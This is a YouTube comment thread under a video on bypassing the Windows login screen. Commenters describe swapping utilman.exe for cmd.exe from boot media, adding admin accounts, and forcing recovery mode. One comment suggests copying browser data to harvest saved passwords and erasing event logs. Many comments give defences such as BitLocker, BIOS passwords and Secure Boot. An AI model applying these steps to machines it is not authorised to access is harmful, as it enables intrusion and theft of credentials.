how hackers bypass windows login screen!

Поділитися
Вставка
  • Опубліковано 21 гру 2024

КОМЕНТАРІ • 1,8 тис.

  • @404-UsernameNotFound
    @404-UsernameNotFound Рік тому +883

    7:00 Brings a whole new meaning to the tooltip "Ease of Access"

    • @PartiallyCooked
      @PartiallyCooked Рік тому +1

      ​@Third-Party Apple Support do you go around assisting people with apple products?

    • @HyperVectra
      @HyperVectra Рік тому +1

      @@PartiallyCooked Why would he? When iCloud Photos scans images to find CSAM, and reports it to Apple directly. They've streamlined the whole process.

    • @SpaceCadet4Jesus
      @SpaceCadet4Jesus Рік тому +1

      This is an old old tip. Been working since at least Windows 7. Unsure if it still works in Windows 11. I'll try it if I get around to it.

    • @samfkt
      @samfkt Рік тому +4

      @@SpaceCadet4Jesus It works sincee WIn 98/95.... since 98 (maybe 95 too) this can also be done with error message (dont send), couple of clicks here and there and a fatal error appears but you are INSIDE....

    • @ATTIQ_OFFICIAL
      @ATTIQ_OFFICIAL Рік тому

      @Third-Party Apple Support third party apple product 💀

  • @ZeevYisrael
    @ZeevYisrael Рік тому +12

    Been a SE since Windows NT and I'm left baffled lol. THIS is what I LOVE about I.T. You never stop learning. Well done.

  • @delvinciposterkid
    @delvinciposterkid Рік тому +30

    I fondly remember doing this exercise during a pc repair class I attended, pretty useful for clients that are "forgetful".

    • @Javv1721
      @Javv1721 Рік тому +2

      Same

    • @T0psyDurpy
      @T0psyDurpy 11 місяців тому +3

      I wish I could send my pc to you I don’t know how to do any of this😭

    • @robincordero3
      @robincordero3 4 місяці тому

      @@T0psyDurpy i can just look at a video one time and do it lol

  • @trinityfoxxx
    @trinityfoxxx Рік тому +6

    Excellent video my friend. I haven't logged into my laptop for 2 years and I forgot my password, I tried for 2 weeks different passwords but couldn't remember. This video saved me over $100 at the computer shop to get them to do it. I fixed it myself at home in front of the TV :)

  • @gustavogattinger
    @gustavogattinger Рік тому +864

    There is an even easier way in which you don't have to use the cmd to rename and copy cmd, that is opening notepad.exe from the cmd, navigating from the open file menu, and changing whatever you want. Windows is really easy to hack at these levels, all you need to do is a little research.
    As always, great content!

    • @bluetopia42
      @bluetopia42 Рік тому +13

      Yeah, wasn't it like CTRL+ALT+DEL and run the cmd task?

    • @RotemNeshaGalea
      @RotemNeshaGalea Рік тому +24

      I try to follow you but you dont have content

    • @Redwan777
      @Redwan777 Рік тому +20

      And it doesn't even have to be a windows installation media.Any Linux installation media will be enough too and if it has Live USB, you can enjoy the comfort of editing files from a GUI file manager. Unless that Linux doesn't come prepackaged with secure boot nonsense of course.

    • @Redwan777
      @Redwan777 Рік тому +5

      @@miguelquintana7084 For what?

    • @ragtop63
      @ragtop63 Рік тому +31

      And how, pray tell, do you gain access to the computer to even open notepad in the first place?

  • @boardingurban
    @boardingurban Рік тому +42

    Not the commands and actions I do during this exploit, but very informative nonetheless without teaching people how to do damage. There are additional steps to make it untraceable, especially on enterprise computers (which you would also have to unplug ethernet before boot). Nice choice with the Windows Install IMG over Linux (simpler to use, and allows you to just use the computer on your own OS), as it is digitally signed by MS and less likely to trigger the unsigned drive error (which would require a bios password [not hard to bypass]. However, this will not work on an encrypted drive, which i encourage all IT managers to undergo. Bitlocker takes 5 min to set up domain-wide. To prevent this attack on your machine, set a bios password, set another password for boot loader/menu, encrypt your drives, and disable automatic startup repair.

    • @smojovi
      @smojovi Рік тому +2

      Definitely Blocker and disable boot from USB.

    • @IndrajitPoirahInsomniac
      @IndrajitPoirahInsomniac Рік тому

      how is it possible to open the computer without the user knowing? i.e. password cant be changed, or can the password be seen?

    • @boardingurban
      @boardingurban Рік тому

      @@IndrajitPoirahInsomniac specify your question. I don't understand what you mean by user knowing?

    • @IndrajitPoirahInsomniac
      @IndrajitPoirahInsomniac Рік тому

      @@boardingurban I mean how to know the password of windows without changing or disabling it

    • @boardingurban
      @boardingurban Рік тому

      @@IndrajitPoirahInsomniac oh easy. Boot menu / window install disc / Repair your computer/ cmd . Then, you play around and do some things with root access such as, renaming utilman.exe to HypoteticallySpeaking.exe and copying cmd and renaming the copy the former. After a restart, you will find rather funny how the lockscreen accessibility option will now return a root cmd window where you can just type explorer.exe and watch the pc boot w/o a password

  • @Human_Shrek
    @Human_Shrek Рік тому +202

    This is basically the sticky keys (bug /hack) from Windows 7, you'd hit a key 5 times and Cmd window would popup rather than the sticky key message. Most companies already have the Usb and Bios disabled. So this is only useful if you forget your microsoft password.

    • @gamemak0r
      @gamemak0r Рік тому +2

      With BYOD it is a lot harder for IT teams to lock down on everyone having a locked bios with boot to usb disabled.

    • @Luftbubblan
      @Luftbubblan Рік тому +3

      Ye, been around for ages. Interesting that they never seem to shut it down.

    • @PanoptesDreams
      @PanoptesDreams Рік тому +3

      @@Luftbubblan Effectively.. you can't. You're better off having remote management tools that can scan and remove unwanted software, unknown logins, etc.
      It's is affectively patched by using a Microsoft account

    • @михаилказанцев-п4щ
      @михаилказанцев-п4щ Рік тому +4

      BIOS locking is not enough. They shoud use disk encryption, and better thin clients with centralized server farm.

    • @krsameer1
      @krsameer1 Рік тому

      @@PanoptesDreams very old trick. This was done with windows 7

  • @OneBiasedOpinion
    @OneBiasedOpinion Рік тому +13

    I love stuff like this. Once you see the trick, it’s so simple, but I would _never_ have thought of using this as a route into the command prompt screen.

  • @itsTyrion
    @itsTyrion Рік тому +290

    this has been known for years, around since Windows 7, and you made it potentially more complex than is needed - you can also hit the reset key twice while Windows is booting. In startup recovery, you sometimes don't even need a password to open the CMD and change things from there

    • @Act2ve
      @Act2ve Рік тому

      Fr, I honestly hate “hacker” content like this shit, it’s just cringy and kinda obvious

    • @munch255
      @munch255 Рік тому +8

      @@manuell3505 is there any way to see the password without changing it?

    • @brightdorian2890
      @brightdorian2890 Рік тому +9

      This is the only working method now, you will need a password @startup recovery when opening CMD (windows 10)

    • @brightdorian2890
      @brightdorian2890 Рік тому +4

      @@munch255 no password is hashed even if you see it

    • @manuell3505
      @manuell3505 Рік тому +6

      @@munch255 That's totally boarded up. You have to trace down and decrypt the key-data that was generated when the password was set. Windows uses some random construct and doesn't store anything about it. For security, also the location on disk varies.
      But why would you if you can just boot another system from USB-stick and acces the NTFS partitions?
      It must be hackable, though. Maybe boot the physical disk inside an emulator, so you can scan the whole virtual system's RAM for changes at adress-level.

  • @smashmastersstuffs
    @smashmastersstuffs Рік тому +45

    The main obstacle to this is just disk encryption with bitlocker, but the amount of people who don't have it on (esp because not everyone buys win 10 pro and signs in with a ms account) is large enough I think. But this is def an accurate representation of what someone could do if they stole your computer.
    In fact if your password is weak enough they could even bruteforce the hash with special software.

    • @unconnectedbedna
      @unconnectedbedna Рік тому +1

      I mean, if someone steals you computer that is unencrypted they can just take the hd and connect it to another computer, or run a live linux usb and access the data.
      But yes! Encryption is the absolute best protection, until you loose that darn key... xD

    • @roguethemachine3928
      @roguethemachine3928 Рік тому

      you can decrypt a bitlocker file from cmd so yeah gl with that

    • @MAGAMAN
      @MAGAMAN Рік тому +1

      Encryption is the best way to lose everything on your hard drive.

    • @Crimin4L
      @Crimin4L Рік тому

      not if you have more than 2 braincells to save the recovery key(s)@@MAGAMAN

    • @picsnmorede
      @picsnmorede Рік тому

      ​@@MAGAMANWell, for people with this opinion you Just have to Strike 'Enter' at the Password prompt and you are in without any File renaming.

  • @cxi8147
    @cxi8147 Рік тому +184

    This was actually really simple :p no clickbait. Appreciate it.

    • @rahuldev2205
      @rahuldev2205 Рік тому +3

      bros no clickbait.

    • @cxi8147
      @cxi8147 Рік тому +4

      @@rahuldev2205 a rare trait in this climate nowadays. Because of that I'm now subbed since and watched a ton more vids of his.

  • @PhantomWorksStudios
    @PhantomWorksStudios Рік тому +45

    There are multiple ways of making this secure.
    1.
    for business and home make sure that your case has a lock on it so someone can't remove the cmos battery and reset the bios.
    2. Make sure the PC always boots from the hard drive first
    3. Most importantly make sure your bios has a password set
    4. Disable boot select menu
    Also Microsoft can prevent this from having the main login UI check to see if any programs that it launches during the login screen has been tampared or can even block programs while on the logon screen.

    • @Embr4c3
      @Embr4c3 Рік тому +5

      Bitlocker also works

    • @TheFurrry
      @TheFurrry Рік тому +3

      resetting the bios will not reset the windows log in password.

    • @PhantomWorksStudios
      @PhantomWorksStudios Рік тому +2

      @@TheFurrry no but resetting the bios makes it where it will clear the bios password at which point the user doesn't even need access to the windows or to bypass security

    • @o.OIndyTreesO.o
      @o.OIndyTreesO.o Рік тому

      Step 2 could cause you a dilemma in the future if you run into any drive problems and need to boot from a USB. Step 3 and 4 should be enough, right lol? xD

    • @PhantomWorksStudios
      @PhantomWorksStudios Рік тому

      @@o.OIndyTreesO.oif that's the case then it would be the admin/owner that would need to boot from the cd drive at which case should know the password anyways

  • @elmeromero303
    @elmeromero303 Рік тому +15

    In some cases you can't change the password (policies etc). You can create a new user (net user add etc) and put em to administrators group, login with this new account and you can see all local users and change their passwords. In some older versions you can also change domain users passwords - before login disable network so the domain controller will not be found by the os 😊

  • @ChaosV999
    @ChaosV999 6 місяців тому

    THANK YOU!!! THANK YOU!!! Some POS hacked my computer, created a user file for himself as administrator and it was password protected. He also installed something that froze my screen within 12 seconds. He wanted $400 to "fix" my computer. I told him to stick it (I wasn't so polite). Your video allowed me to hack the hacker, put myself as administrator, removed him and all his programs, and eventually fixed everything. I had your video playing on one computer while I fixed the hacked computer and your instructions were perfect. THANK YOU!

  • @NoEgg4u
    @NoEgg4u Рік тому +6

    There is no need to do the download and USB set-up, etc.
    When starting your computer, if you shut the power a couple of times in a row, then the next time that you start the computer, you will be offered a menu to repair your computer.
    I do not recall the exact menu. But if you click around, you will find the option for running the command prompt. From there, you can follow our host's instructions.
    Also note that many computers will not allow you to boot from a USB drive, which will prevent you from doing what our host described.
    For those computers, you will have to go into the BIOS, and set a password. After that, you will be able to change a BIOS setting to enable booting from a USB drive. After that, you can remove your BIOS password.

    • @chilidog73
      @chilidog73 Рік тому

      On win 10 (at least mine) you need the password to do anything in recovery. Sometimes you have to enter bios to add a boot option to use the usb. :)

  • @TheGrowOp
    @TheGrowOp Рік тому +1

    I used this first one on my dads old laptop when he forgot the password. It actually startled me how easy it was!

  • @DavidOleksy-yv7vx
    @DavidOleksy-yv7vx Рік тому +46

    This is a pretty neat trick when helping people get into their PCs when they’ve forgotten their passwords; however, I don’t believe this is a common technique for actual hackers. In order for this process to work, the attacker would need to have physical access to the PC to mount the bootable USB installation drive. I’m not saying there aren’t other, more advanced ways to bypass the windows login screen by using CMD, but unless someone with malicious intent has physical access to your machine, this shouldn’t be a concern. But anyways, thanks for the great video and well-explained tutorial!

    • @Emmanuel-is7gm
      @Emmanuel-is7gm Рік тому +7

      This could work well for penetration testers

    • @swollened
      @swollened Рік тому

      This isn't limited to physical access by any stretch.
      This works for Windows Server as well as Windows 10. You could do this remotely with access to a virtual console (say through a breached azure, aws or other cloud provider account), an out of band system management tool like Dell iDrac, or HP iLo, and the media could be attached with a virtual disk mount, PXE network booted etc.
      The reality is though, if a hacker already has this level of access, they aren't going to waste their time attaching a Windows installation ISO.
      If you wanted to protect against this:
      -Enable Bitlocker on Windows
      -Enable SecureBoot in the BIOS
      -Password protect the BIOS.

    • @JC-is1nl
      @JC-is1nl Рік тому

      @@Emmanuel-is7gm i like to do penetration testing

    • @blendingsentinel4797
      @blendingsentinel4797 Рік тому +1

      @@Emmanuel-is7gm Exactly

    • @Clynikal
      @Clynikal Рік тому

      You’re right. I’m pretty sure this is the first thing he pointed out as step one.

  • @SRADracer
    @SRADracer Рік тому +2

    I have a boot cd that can “read” the passwords for all accounts.
    No idea how it works, but handy when someone lost their password.
    Works like a charm 😊

  • @blightfrog
    @blightfrog Рік тому +3

    This vid is really helpful for tech support. So many occasions that we really need this. 😅

  • @dredtCSS
    @dredtCSS Рік тому

    Could of used this some weeks ago when I was accidently logged out of my own PC, and I had to re-install Windows and lose all my data.
    Very nice video - I'm saving it!

    • @xwinglover
      @xwinglover Рік тому

      You could have also created a Linux ISO and booted it up. It would run as a live disk, and then copied your data out to an external drive using the file manager.

  • @Italya3343
    @Italya3343 Рік тому +29

    One of the most amazing videos I have ever seen brother!!!
    Direct, simple, non classical
    Many thanks for sharing 👍
    Looking for watching your next tutorials!!

    • @UltraLimeLife420
      @UltraLimeLife420 Рік тому

      if bios is locked and usb boot is disabled this cant be possible!

    • @trondremix
      @trondremix Рік тому

      @@UltraLimeLife420 It is still possible unless the hard disk is encrypted. You can trigger a troubleshooter and get access to the filesystem that way.

    • @UserSOF0
      @UserSOF0 Рік тому

      @@trondremix
      so you're saying that i can bypass bios password?
      can you clarify

  • @xistam
    @xistam Рік тому +1

    Known about this trick for years. Used to use it all the time back at my old job in a small computer shop when someone would come in with an old laptop they don't know the password for anymore. Crazy it still hasn't been patched to this day.

  • @firsttimegaming3557
    @firsttimegaming3557 Рік тому +15

    Most computers, especially company computers won’t allow you to boot the usb without entering bios first and it’s generally locked by a password, there’s still ways to get around that but this method requires a few more steps to work on most computers

    • @mrkmpn
      @mrkmpn Рік тому +11

      I work in a repair shop and at least 90% of the computers I get in will boot from USB without making any changes to the BIOS, and less than 1% have the BIOS password protected. The biggest and most common obstacle these days is the increasing number of drives that are encrypted with bitlocker.

    • @vapefybeatz3322
      @vapefybeatz3322 Рік тому

      i’m not sure, but if you take out the bios battery for a few secs, the bios resets itself and the password is gone. is that true?
      i’ve done that with a old laptop years ago, does it work nowadays?

    • @mrkmpn
      @mrkmpn Рік тому +1

      @@vapefybeatz3322 Not necessarily. For one thing, Not all laptops have bios batteries anymore, and the bios password isn't always stored in the same place and can only be change or cleared by dumping, editing, and reflashing the bios with a chip programmer.

    • @Jee2024IIT
      @Jee2024IIT Рік тому

      @@mrkmpn how do you do that 1% problems?

    • @rainmakersg73
      @rainmakersg73 Рік тому +1

      Boot USB is not required. Just hold down shift and restart . Release shift after restart screen appears. Then -> troubleshoot -> Advanced options -> Command Prompt

  • @thededicatedbiker
    @thededicatedbiker Рік тому

    I actually taught this years ago when I was teaching computers at a grade school. I learned it from another tutorial. Like you I was amazed that it worked the first time I tried it.

  • @tomle2600
    @tomle2600 Рік тому +36

    Doesn’t work if you have bios password or bitlocker enabled.
    Easier to boot from any remote disk and replace admin password.

    • @gtarules1
      @gtarules1 Рік тому +4

      @@Boygadget what about bitlocker?

    • @erikjvanderveen
      @erikjvanderveen Рік тому +8

      @@Boygadget nope... your password is not in your cmos

    • @Boygadget
      @Boygadget Рік тому +2

      @@gtarules1 this is only for the bios password. it wont work for bitlocker

    • @mal798
      @mal798 Рік тому

      Again though, you need bitlocker pw

    • @maklogetrich2378
      @maklogetrich2378 Рік тому +1

      @@Boygadget lame, this method is not working for a long time ago

  • @DeepSpace_Pw
    @DeepSpace_Pw Рік тому

    I already heard of it years ago, but thought to have read they fixed it at some time. With your upload being just 3 weeks ago, I would say it still works.

  • @juliusrowe9374
    @juliusrowe9374 Рік тому +44

    Fantastic tutorial Loi! Fairly straight-forward too!

    • @BlacKi-nd4uy
      @BlacKi-nd4uy Рік тому +1

      what is "copy cmd.exe utilman.exe" doing?

    • @jaylord55
      @jaylord55 Рік тому

      @@BlacKi-nd4uy it is copying the cmd.exe and renaming it utilman.exe in one process so you don't have to manually rename the cmd.exe after copying it into the folder and allowing you to use the cmd.exe from in windows boot

    • @exo469
      @exo469 Рік тому

      ​@@BlacKi-nd4uy copying the content pf cmd.
      exe and save it as untilman.exe

    • @kidpresident_1475
      @kidpresident_1475 Рік тому +3

      When you press the little button in the bottom-right it brings up utility management. So he is changing the name of utility management to utility management 2, and then renaming the command line to utility manager so when that button is pressed it brings up the command line instead of the utility manager.

    • @tomsmith6513
      @tomsmith6513 Рік тому

      This is how you hack into your boss's computer, how you get back at a bad boss.

  • @jacksch0ey
    @jacksch0ey Рік тому +1

    used to do this on my school computers. except it was windows 7 and all i had to do was shut it off on reboot 3 times and then it would launch startup troubleshooter which allows u to access notepad ;)

  • @ErrorXTech
    @ErrorXTech Рік тому +2

    you don't even need any bootable drive just to fire up that X: terminal...
    > forcibly stop win with the stop button, then again start. wait 2 sec, when it's booting stop it to stop again.
    > repeat this 4-6 times... now win will not boot normally, instead, (Because Win will detect unstable booting issues ) it will show you the screen will a lot of things to repair win like restart, reset, etc.. from there you will have an option for "Command tool" inside of the advanced option.
    Booyah!!!!

  • @arduinoguru7233
    @arduinoguru7233 Рік тому +7

    6:48 BTW you can do all these stuff with the smallest Linux Distros, even you can get utilities to change password and modify Windows registry

  • @jonjones6017
    @jonjones6017 Рік тому

    I first saw someone (a CEH) do this about 6 months ago and I was shocked and intrigued to study CEH as well. The difference was at the CMD he created a local admin account on the machine and logged in with that

  • @longlost8424
    @longlost8424 Рік тому +14

    you can also do this by booting into "repair" mode. I've accomplished this by power cycling the system several times, and then using the command screen to do basically the same thing. I've also used the hirens boot cd to reset the administrator account password (client as well as server). will need to try this method again someday on a winders 11 system. as always Loi, Gr8 tutorial.......

    • @ShinyTechThings
      @ShinyTechThings Рік тому +2

      Same here, no USB needed. Hold shift and click on reboot.

    • @jamieclarke2694
      @jamieclarke2694 Рік тому

      ​@@ShinyTechThings just about to say this. Had to the other day and wasn't aware safe mode boot process had changed

    • @borko.danilovic
      @borko.danilovic Рік тому +2

      To get to Command Screen in recovery mode, you also need the profile password.

    • @maklogetrich2378
      @maklogetrich2378 Рік тому +1

      no, you can't
      in order to use recovery mode, you have to input user password
      and by the way, you don't really need to power cycling the system, just get in to windows user login, click the power button, hold shift button while clicking restart button
      it's easier and reduce the possibility of breaking your system
      or better yet, just use some kind of hiren boot / mini windows

    • @Nehesi
      @Nehesi Рік тому

      I don't think this would work on a BL machine or woe that has an admin password for BIOS.

  • @painfull73
    @painfull73 Рік тому

    Ohhhh, 7 DAYS ago!! Wow! I thought it said 7 YEARS ago when this video was uploaded. Given the content, that made sense, because this hack is as old as Windows 7! :D 8/10 for production value though ;)

  • @cougar-town
    @cougar-town Рік тому +22

    I knew about this over a decade ago. But thanks for sharing it anyway.

    • @john_doe1st
      @john_doe1st Рік тому +8

      Funny no one has seen your video about it.

    • @jamieclarke2694
      @jamieclarke2694 Рік тому

      ​@@john_doe1st I've seen it, at least a decade ago

    • @Luftbubblan
      @Luftbubblan Рік тому

      @@john_doe1st It sure is an old thing, almost to the point it should be common knowledge! stickey keys :D

    • @abritabroadinthephilippines
      @abritabroadinthephilippines Рік тому

      @@hk0444 This channel doesn't have any content

    • @AndrewSpec
      @AndrewSpec Рік тому

      yup, I used that many years ago.

  • @speakupOfficial
    @speakupOfficial Рік тому +2

    FYI: This works on every single version of windows since XP (including windows 11). Microsoft knows about this backdoor and are intentionally keeping it available. I've tested this myself. It only works on nondomain PC's tho. But once you're in, you could simply copy the appdata from Chrome or other browsers. Just copy it to the USB. These files contain every password saved in that browser, and you can easily get to it by replacing the appdata folder on another computer. I hacked my own passwords in 7 minutes. Scary stuff.
    Also: Don't forget to erase your tracks in the event viewer.

  • @Aguga
    @Aguga Рік тому +10

    If the user account you are targetting is a Microsoft Account it could be that you can't change the password. In that case you could just create a new user with admin rights.

  • @fanprocar
    @fanprocar Рік тому

    I wrote the instructions down on a paper and memorised them after many tries. Thanks a lot for this video!

  • @neymat3257
    @neymat3257 Рік тому +7

    You can do same without a usb windows bootable drive, only physical access is required.
    To void this: use drives auto bitlocker enabled, which unlock automatically after your login and auto lock after reboot or poweroff.
    Whenever someone try same they will face bitlocker encryption.
    Good guide, keep it up 👍

    • @nguyenquy3659
      @nguyenquy3659 Рік тому

      "You can do same without a usb windows bootable drive, only physical access is required " => Do you mean , force turn off the computer 3-4 times ?

    • @ThatOne5
      @ThatOne5 9 місяців тому

      well to open the CMD you'll still need a password on recovery mode I've just tried it, unless you are talking about another method.

    • @farazhayder8473
      @farazhayder8473 5 місяців тому

      In windows home edition bitlocker encryption is not available. Do you know any other way to avoid this?

  • @SinOfLustAMV
    @SinOfLustAMV Рік тому

    Thanks.. this is helpful in case we forget password of a local account.. simple and straight to the point!

    • @SOTP.
      @SOTP. Рік тому +1

      Also acts as a "debug" feature which is really useful when you break windows (you have to use sticky keys tho) since usually you’re locked out from getting to a cmd or gaining control, but with this...

  • @joearcidiacono264
    @joearcidiacono264 Рік тому +6

    This is one method but I just prefer a bootable USB and running tools such as hiren(there are many many, many others). Much easier. However and I must warn those tools are ONLY meant for technicians to tshoot a owner's machine or help an owner at retrieving old files they may need.

  • @l21kato
    @l21kato 10 днів тому +1

    Thank you lio lian liang for making a tutorial for non-local accounts

  • @Stiwjak
    @Stiwjak Рік тому +5

    Are you doing the same on windows 11?. With all the latest updates + defender?

    • @MacGuffin1
      @MacGuffin1 Рік тому +1

      I doubt it, I dont think this works anymore

    • @Deezeone
      @Deezeone Рік тому

      @@MacGuffin1 nah it doesnt see c: anymore only the ISO

  • @tallpaul9475
    @tallpaul9475 Рік тому +1

    This seems so much easier/more simple than using a Linux ISO boot to redo account passwords. Thanks for the info!

  • @kaiduwu
    @kaiduwu Рік тому +8

    Known this for a very long time, quite useful sometimes!

    • @404_gaming_channel9
      @404_gaming_channel9 Рік тому

      im sure is still works as well in windows 11

    • @AK_Studioz
      @AK_Studioz Рік тому

      which times😂?

    • @kaiduwu
      @kaiduwu Рік тому

      @@AK_Studioz here's one, a relative found lost laptop from many years ago, doesn't know the login, brings it to me because I'm known to be into cybersec, I can quickly fix it for them.
      Another more nefarious use, bypassing restrictions on domain computers

    • @geroffmilan3328
      @geroffmilan3328 Рік тому

      If the stars align, yeah it's useful.
      But if Bitlocker is implemented properly, no dice - choose another vector.

    • @kaiduwu
      @kaiduwu Рік тому

      @@geroffmilan3328 the stars align? More like flipping a coin, many pcs just don't use bitlocker
      However yes, if bitlocker is set up, you're outta luck with that method

  • @toastedBook
    @toastedBook Рік тому

    So this is why in my previous school we had to agree to not use usb's on the computers without permission. Also i hacked my self cuz i did a typo when changing password. So thanks for the very simple and useful tutorial 👍 now i have to finish organizing my files

  • @DS6Prophet
    @DS6Prophet Рік тому +31

    I wanted to tell you a huge thank you for all your incredible showcases & work! You inspired me to get into all this cuber security stuff! You are amazing, Mr Loi!

    • @TheMessanger
      @TheMessanger Рік тому

      just use AD and your in

    • @mr.simpleeditor7157
      @mr.simpleeditor7157 Рік тому

      ​@@TheMessanger AD?

    • @jamieclarke2694
      @jamieclarke2694 Рік тому

      ​@@TheMessanger Active Directory? 🤣

    • @TheMessanger
      @TheMessanger Рік тому

      @Jamie Clarke close but not what would u use

    • @jamieclarke2694
      @jamieclarke2694 Рік тому +1

      @@TheMessanger close? AD is Active Directory lol you need another acronym if you're talking about something else, or just say the name of it, the youtube police aren't coming to get you ya know, no need for encryption on a UA-cam comment 😅

  • @member529
    @member529 Рік тому +2

    I thought this was going to be how to get past it while the user is logged in / without having to reboot. :(
    This password reset trick is oooooooold

  • @we_are_fsociety_29
    @we_are_fsociety_29 Рік тому +6

    You are awesome 🤠. Sir make video on Android termux.

  • @jamesrichardson3115
    @jamesrichardson3115 Рік тому +1

    I think it's funny how arm chair hacks reply with disgust, remembering some hack a computer guy or Google gave them - you bring a fresh breath to the younger crowd to get them involved. Props bro from an old hack 😂

  • @mukeshpatil6887
    @mukeshpatil6887 Рік тому +4

    Also if this hack needs to be performed in a big organization then it'd better to have the network cable disconnected and Cary out the operation other wise CrowdStrike detects this one.( anyways when it's back online will will detect) 🙁

  • @jbooks888
    @jbooks888 Рік тому

    Oh yeah, real easy. I just went to get a coffee and I almost fell over from dizziness and mental confusion. I DID NOT understand a word you said.

  • @florianvo7616
    @florianvo7616 Рік тому +10

    a bit of research: this technique only ever worked with local windows accounts, not with microsoft accounts. Also it doesn't work anymore since "Windows 10 1809"

    • @tairikuokami
      @tairikuokami Рік тому

      It works on the latest Windows 11. I use it as a backup, it is useful to have CMD with SYSTEM rights before logon.

    • @wangzhe5daidinnerout
      @wangzhe5daidinnerout Рік тому

      @@tairikuokami dear, u did try the pin+tpm(ofcause in win11)+bitlocker ? / or u just tried the winAccPW+tpm(ofcause in win11)+bitlocker

    • @jochemgroeneweg6965
      @jochemgroeneweg6965 Рік тому

      You can create a new admin account, go to explorer, navigate to the users folder, click on the user with the microsoft account and you can still see all the files of that user, edit them, copy them over, delete them, ...

  • @evilgeniusxp
    @evilgeniusxp 6 місяців тому

    Did this today on new install with all updates on win 10. Worked perfectly

  • @happinesscompilation5252
    @happinesscompilation5252 Рік тому +9

    This is a very old/basic method of bypassing the login screen. Most admins will disable the ease of access option from the beginning.

    • @Jjarret
      @Jjarret Рік тому

      Lol

    • @Jee2024IIT
      @Jee2024IIT Рік тому

      Then can we program it on any other option?

    • @SOTP.
      @SOTP. Рік тому

      @@Jee2024IIT yes, even the login screen itself which of course wont be disabled (else it bricks the system)

    • @SOTP.
      @SOTP. Рік тому

      I actually never saw anyone disable it. Even if they do, theres tons of programs you can use to do the same.

  • @RIOTNOOB
    @RIOTNOOB Рік тому +1

    Thank you my Father in Law passed away and my Mother In Law needed access to his PC.

  • @Effectivebasketball
    @Effectivebasketball Рік тому +2

    You did everything right although even a beginner's hacker would not do that. Everything you explained is a nice way for the users to get back to their system and its has nothing to do with hacking.

  • @EZLogikal
    @EZLogikal Рік тому

    I will have to remember this the next time I accidentally lock myself out of my own box. For me, it's better to leave no trace... this will definitely alert the user they have been pwned. Super useful, though!

  • @toweliethetowel8280
    @toweliethetowel8280 Рік тому +9

    7:03 That laugh was pure evil. Better like this video for not being hacked.

    • @nizu9544
      @nizu9544 Рік тому +1

      i use BlackArch-Linux btw

  • @ljsystems5694
    @ljsystems5694 Рік тому +7

    To stop this kind of attack in the first place, you can setup a bios password. Just make sure you can not boot from a other drive / usb stick, without typing the bios password before.

    • @timmytainment
      @timmytainment Рік тому +1

      U should bypass even that by resetting youf bios on hardware lvl

    • @SOTP.
      @SOTP. Рік тому

      Sometimes people leave out the bootmenu/accedentally leave the cd, floppy disk or other as the priority and so you can boot from it. If all that doesnt work, you can only reset the bios or take out the hard drive so it boots from usb then reconnect the hard drive (if it even gets recognized)

  • @m3ow21
    @m3ow21 Рік тому

    I've done this once when I accidentally locked my father's laptop. I was so thrilled when it worked and it saved my life as well😅.

  • @Gunmetalsunglasses
    @Gunmetalsunglasses Рік тому +7

    That was done with ease of access on Win7 years ago. A little different but same concept

    • @dillonbabb7156
      @dillonbabb7156 Рік тому +1

      i'm really surprised that they still haven't done anything about this. i would suggest a hash verification function of the called program before letting any of these buttons continue the call. should add very little time.

    • @EvilSapphireR
      @EvilSapphireR Рік тому

      @@dillonbabb7156 that would mean microsoft would never be able to reliably patch utilman.exe in case there's any vulnerability.

    • @Jee2024IIT
      @Jee2024IIT Рік тому

      Can I ask one question?
      What if we directly write the password changing command on cmd on that reboot step only??

    • @samfkt
      @samfkt Рік тому

      Its exactly the same...... sama as in this video or another method with: "startup repair"..... and its working since win 95/98.

  • @Roberto-fz4jm
    @Roberto-fz4jm Рік тому

    This is the first video I've seen and it got me subscribed.

  • @edgarfernandez8998
    @edgarfernandez8998 Рік тому +9

    I believe you could have changed the password from the CMD prompt while you were booted on the usb key. So this way the Windows exe file stays unmodified... No?

    • @firsttimegaming3557
      @firsttimegaming3557 Рік тому +5

      No then it would have changed on the windows installation media not the actual OS

    • @muskafella
      @muskafella Рік тому

      No. Fail bro fail

  • @ItsOnlyLogixal
    @ItsOnlyLogixal Рік тому

    Known this for many years. Nice to know I knew something the great hacker Loi didnt!

  • @rogermouton2273
    @rogermouton2273 Рік тому +23

    It's always felt like a security risk to me to allow anything to be done without logging in. Turns out I was right. Seems to me that, especially after all these years, MS are completely negligent for not fixing this.

    • @thesoulsender
      @thesoulsender Рік тому +4

      definitely a reason to encrypt your drive

    • @vedranb87
      @vedranb87 Рік тому

      @@thesoulsender how does encryption prevent this exploit? I thought that once you're at login screen the encryption is already bypassed on a hardware level. I changed a motherboard recently and I couldn't boot until I dug out my Bitlocker key, but past that, harddrive is accessible with installation media.
      I even was able to use registry to enable a local offline login with a password because the network driver wasn't working so I couldn't log in with the PIN and it wanted to authenticate online only which obviously wasn't working without the network driver.

    • @thesoulsender
      @thesoulsender Рік тому +3

      @@vedranb87 when you boot into a live environment like the installer, the drive the actual system is on isn’t mounted and decrypted yet, so you can’t access anything on it. If you don’t believe me, try it yourself with bitlocker on and a windows or even a linux live environment

    • @flyhigh6047
      @flyhigh6047 Рік тому

      @@vedranb87 a bit late, but un encrypted drive is essentially usable by other devices, try plugging ur boot drive to another machine as a non boot drive and the data will be read and writable.

    • @JesseFleming1990
      @JesseFleming1990 Рік тому +1

      Not sure that's accurate. MS utilizes UEFI and Bitlocker encryption. Technically if you have access to an unencrypted disk you could do anything and that's on whomever installed your OS without Bitlocker.

  • @daanmageddon
    @daanmageddon 11 місяців тому +1

    Won't work on a properly secured system with storage encryption like bitlocker. Also when rebooting there is no guarantee the bios is set to boot from removable media. However you can try to hold shift when clicking restart, modern windows systems will show a dialogue that could allow you to boot from removable media on next boot(but again, if properly secured by gpo's that should not be allowed). By the way hacking the local sam db is as old as windows xp, so instead of messing up your windows installation you could just take that time to create an ntpassword reset usb stick, still the same caveats apply. This isnt as exciting and revolutionary as you portray it to be imho.

  • @greeneyes-_-
    @greeneyes-_- Рік тому +3

    If only I knew this 3 months ago when drunk me changed the password then forgot it next morning.

  • @Lardzor
    @Lardzor Рік тому +1

    Hiren's Boot CD is free software that has a utility to reset Windows 10 passwords. You just boot from CD / USB which uses a slimmed down version of Linux since Linux does not respect Microsoft file permissions it can access Windows user account files. Then run the password utility, choose the user account and change password. It seems simpler than the method in this video.

  • @unmountablecyiber4416
    @unmountablecyiber4416 Рік тому +8

    Only works on local accounts not on connected microsoft accounts sadly

    • @RassieKariuki
      @RassieKariuki Рік тому

      Yeah, then you can use the local admin to change permissions of other user folders.

    • @rebel__rana
      @rebel__rana Рік тому

